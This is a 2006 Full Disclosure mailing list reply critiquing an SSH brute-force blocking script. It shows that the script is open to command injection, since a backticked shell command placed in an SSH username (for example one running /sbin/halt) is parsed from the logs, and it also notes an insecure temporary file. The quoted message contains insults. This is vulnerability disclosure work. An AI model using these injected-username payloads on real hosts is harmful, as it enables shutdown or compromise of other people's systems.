Full Disclosure mailing list archives

Re: SSH brute force blocking tool

From: Tavis Ormandy <taviso () gentoo org>
Date: Mon, 27 Nov 2006 21:02:31 +0000

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:

Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
/////
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >>
/tmp/hosts.deny

insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.

$ ssh "error retrieving"@localhost & ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.